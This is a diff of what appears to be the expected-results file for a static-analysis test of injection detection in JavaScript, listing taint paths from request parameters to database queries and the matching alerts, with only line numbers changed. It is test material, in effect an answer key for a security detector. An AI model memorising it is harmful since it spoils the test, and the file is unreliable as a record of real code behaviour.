mongoose.js:89:46:89:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:92:46:92:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:94:51:94:55 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:96:46:96:50 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:104:21:104:25 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:111:14:111:18 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:113:31:113:35 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:133:38:133:42 | query | provenance | Config | -| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:136:30:136:34 | query | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:24:21:24:27 | [query] | provenance | Config | -| mongoose.js:24:22:24:26 | query | mongoose.js:27:17:27:21 | query | provenance | | -| mongoose.js:27:17:27:21 | query | mongoose.js:30:22:30:26 | query | provenance | | -| mongoose.js:30:22:30:26 | query | mongoose.js:33:21:33:25 | query | provenance | | -| mongoose.js:33:21:33:25 | query | mongoose.js:36:28:36:32 | query | provenance | | -| mongoose.js:36:28:36:32 | query | mongoose.js:39:16:39:20 | query | provenance | | -| mongoose.js:39:16:39:20 | query | mongoose.js:42:19:42:23 | query | provenance | | -| mongoose.js:42:19:42:23 | query | mongoose.js:45:28:45:32 | query | provenance | | -| mongoose.js:45:28:45:32 | query | mongoose.js:48:28:48:32 | query | provenance | | -| mongoose.js:48:28:48:32 | query | mongoose.js:51:28:51:32 | query | provenance | | -| mongoose.js:51:28:51:32 | query | mongoose.js:54:22:54:26 | query | provenance | | -| mongoose.js:54:22:54:26 | query | mongoose.js:57:18:57:22 | query | provenance | | -| mongoose.js:57:18:57:22 | query | mongoose.js:60:22:60:26 | query | 
provenance | | -| mongoose.js:60:22:60:26 | query | mongoose.js:63:21:63:25 | query | provenance | | -| mongoose.js:63:21:63:25 | query | mongoose.js:65:32:65:36 | query | provenance | | -| mongoose.js:65:32:65:36 | query | mongoose.js:67:27:67:31 | query | provenance | | -| mongoose.js:67:27:67:31 | query | mongoose.js:68:8:68:12 | query | provenance | | -| mongoose.js:68:8:68:12 | query | mongoose.js:71:17:71:21 | query | provenance | | -| mongoose.js:71:17:71:21 | query | mongoose.js:72:10:72:14 | query | provenance | | -| mongoose.js:72:10:72:14 | query | mongoose.js:73:8:73:12 | query | provenance | | -| mongoose.js:73:8:73:12 | query | mongoose.js:74:7:74:11 | query | provenance | | -| mongoose.js:74:7:74:11 | query | mongoose.js:75:16:75:20 | query | provenance | | -| mongoose.js:75:16:75:20 | query | mongoose.js:76:12:76:16 | query | provenance | | -| mongoose.js:76:12:76:16 | query | mongoose.js:77:10:77:14 | query | provenance | | -| mongoose.js:77:10:77:14 | query | mongoose.js:81:37:81:41 | query | provenance | | -| mongoose.js:81:37:81:41 | query | mongoose.js:82:46:82:50 | query | provenance | | -| mongoose.js:82:46:82:50 | query | mongoose.js:83:47:83:51 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:85:46:85:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:87:51:87:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:89:46:89:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:92:46:92:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:94:51:94:55 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:96:46:96:50 | query | provenance | | -| mongoose.js:83:47:83:51 | query | mongoose.js:104:21:104:25 | query | provenance | | -| mongoose.js:104:21:104:25 | query | mongoose.js:111:14:111:18 | query | provenance | | -| mongoose.js:111:14:111:18 | query | mongoose.js:113:31:113:35 | query | provenance | | -| 
mongoose.js:113:31:113:35 | query | mongoose.js:133:38:133:42 | query | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:123:20:123:21 | id | provenance | | -| mongoose.js:115:6:115:22 | id | mongoose.js:130:23:130:24 | id | provenance | | -| mongoose.js:115:11:115:22 | req.query.id | mongoose.js:115:6:115:22 | id | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:116:22:116:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:117:21:117:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:118:21:118:24 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:119:18:119:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:120:22:120:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:121:16:121:19 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:122:19:122:22 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:124:28:124:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:125:28:125:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:126:28:126:31 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:127:18:127:21 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:128:22:128:25 | cond | provenance | | -| mongoose.js:115:25:115:45 | cond | mongoose.js:129:21:129:24 | cond | provenance | | -| mongoose.js:115:32:115:45 | req.query.cond | mongoose.js:115:25:115:45 | cond | provenance | | -| mongoose.js:130:23:130:24 | id | mongoose.js:130:16:130:26 | { _id: id } | provenance | Config | -| mongoose.js:133:38:133:42 | query | mongoose.js:136:30:136:34 | query | provenance | | -| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:23:19:23:23 | query | provenance | | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:90:21:90:25 | query | provenance | Config | +| 
mongoose.js:21:16:21:29 | req.body.title | mongoose.js:97:14:97:18 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:99:31:99:35 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:119:38:119:42 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:122:30:122:34 | query | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:23:21:23:27 | [query] | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:25:17:25:21 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:27:22:27:26 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:29:21:29:25 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:31:28:31:32 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:33:16:33:20 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:35:19:35:23 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:37:28:37:32 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:39:28:39:32 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:41:28:41:32 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:43:22:43:26 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:45:18:45:22 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:47:22:47:26 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:49:21:49:25 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:51:32:51:36 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:53:27:53:31 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:54:8:54:12 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:57:17:57:21 | query 
| mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:58:10:58:14 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:59:8:59:12 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:60:7:60:11 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:61:16:61:20 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:62:12:62:16 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:63:10:63:14 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:67:37:67:41 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:68:46:68:50 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:71:46:71:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:73:51:73:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:75:46:75:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:78:46:78:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:80:51:80:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:82:46:82:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:90:21:90:25 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:97:14:97:18 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:99:31:99:35 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:109:20:109:21 | id | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:116:23:116:24 | id | provenance | | +| mongoose.js:101:11:101:22 | req.query.id | mongoose.js:101:6:101:22 | id | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:102:22:102:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | 
mongoose.js:103:21:103:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:104:21:104:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:105:18:105:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:106:22:106:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:107:16:107:19 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:108:19:108:22 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:110:28:110:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:111:28:111:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:112:28:112:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:113:18:113:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:114:22:114:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:115:21:115:24 | cond | provenance | | +| mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:101:25:101:45 | cond | provenance | | +| mongoose.js:116:23:116:24 | id | mongoose.js:116:16:116:26 | { _id: id } | provenance | Config | +| mongoose.js:119:38:119:42 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:22:19:22:23 | query | provenance | | | mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | -| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... 
).title | mongooseJsonParse.js:23:19:23:23 | query | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:22:19:22:23 | query | provenance | Config | | mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | | mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | 
@@ -621,24 +621,24 @@ edges | redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | | socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | | socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | -| tst2.js:9:66:9:78 | req.params.id | tst2.js:9:27:9:84 | "select ... d + "'" | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | | tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | | tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | | tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | | tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | subpaths #select -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:10:34:20:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | -| graphql.js:27:30:27:40 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:27:30:27:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:30:32:30:42 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:30:32:30:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:33:18:33:28 | `foo ${id}` | graphql.js:26:16:26:28 | req.params.id | graphql.js:33:18:33:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:26:16:26:28 | req.params.id | user-provided value | -| graphql.js:44:14:44:24 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:44:14:44:24 | `foo ${id}` | This query string depends on a $@. 
| graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:48:44:48:54 | `foo ${id}` | graphql.js:39:16:39:28 | req.params.id | graphql.js:48:44:48:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:39:16:39:28 | req.params.id | user-provided value | -| graphql.js:56:39:56:49 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:56:39:56:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:58:66:58:76 | `foo ${id}` | graphql.js:55:16:55:28 | req.params.id | graphql.js:58:66:58:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:55:16:55:28 | req.params.id | user-provided value | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | graphql.js:74:14:74:25 | req.query.id | graphql.js:75:46:75:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:84:14:90:8 | `{\\n ... }` | graphql.js:74:14:74:25 | req.query.id | graphql.js:84:14:90:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:74:14:74:25 | req.query.id | user-provided value | -| graphql.js:120:38:120:48 | `foo ${id}` | graphql.js:119:16:119:28 | req.params.id | graphql.js:120:38:120:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:119:16:119:28 | req.params.id | user-provided value | +| graphql.js:9:34:19:5 | ` // $ ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | ` // $ ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. 
| graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{ // $ ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{ // $ ... }` | This query string depends on a $@. 
| graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | | json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | | json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | 
@@ -650,67 +650,67 @@ subpaths | ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | | ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | -| marsdb-flow-to.js:14:17:14:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:14:17:14:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | -| marsdb.js:16:12:16:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:16:12:16:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | -| minimongo.js:18:12:18:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:18:12:18:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | -| mongodb.js:18:16:18:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:18:16:18:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | -| mongodb.js:32:18:32:45 | { title ... itle) } | mongodb.js:26:19:26:26 | req.body | mongodb.js:32:18:32:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:26:19:26:26 | req.body | user-provided value | -| mongodb.js:54:16:54:20 | query | mongodb.js:49:19:49:33 | req.query.title | mongodb.js:54:16:54:20 | query | This query object depends on a $@. 
| mongodb.js:49:19:49:33 | req.query.title | user-provided value | -| mongodb.js:65:12:65:16 | query | mongodb.js:60:16:60:30 | req.query.title | mongodb.js:65:12:65:16 | query | This query object depends on a $@. | mongodb.js:60:16:60:30 | req.query.title | user-provided value | -| mongodb.js:77:14:77:26 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:77:14:77:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:85:12:85:24 | { tags: tag } | mongodb.js:70:13:70:25 | req.query.tag | mongodb.js:85:12:85:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:70:13:70:25 | req.query.tag | user-provided value | -| mongodb.js:112:14:112:18 | query | mongodb.js:107:17:107:29 | queries.title | mongodb.js:112:14:112:18 | query | This query object depends on a $@. | mongodb.js:107:17:107:29 | queries.title | user-provided value | -| mongodb_bodySafe.js:29:16:29:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:29:16:29:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | -| mongoose.js:24:21:24:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:24:21:24:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:27:17:27:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:17:27:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:30:22:30:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:30:22:30:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:33:21:33:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:21:33:25 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:36:28:36:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:36:28:36:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:39:16:39:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:16:39:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:42:19:42:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:42:19:42:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:45:28:45:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:28:45:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:48:28:48:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:48:28:48:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:51:28:51:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:28:51:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:54:22:54:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:22:54:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:57:18:57:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:18:57:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:60:22:60:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:22:60:26 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:63:21:63:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:21:63:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:65:32:65:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:65:32:65:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:67:27:67:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:67:27:67:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:68:8:68:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:8:68:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:71:17:71:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:17:71:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:72:10:72:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:72:10:72:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:73:8:73:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:8:73:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:74:7:74:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:74:7:74:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:75:16:75:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:16:75:20 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | -| mongoose.js:77:10:77:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:77:10:77:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. | minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. 
| mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. 
